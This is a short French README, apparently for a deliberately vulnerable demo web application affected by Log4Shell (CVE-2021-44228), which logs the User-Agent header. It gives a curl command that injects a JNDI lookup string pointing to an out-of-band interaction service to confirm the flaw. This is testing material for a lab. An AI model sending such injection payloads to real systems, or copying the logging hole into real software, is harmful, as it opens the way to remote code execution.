
Application web simple qui est vulnérable à Log4Shell (CVE-2021-44228)
L'application enregistre l'en-tête 'User-Agent', ce qui permet de tester la vulnérabilité avec curl et par exemple interactsh-service :
curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/
On devrait voir une interaction DNS sur app.interactsh.com.
Lien vers Docker hub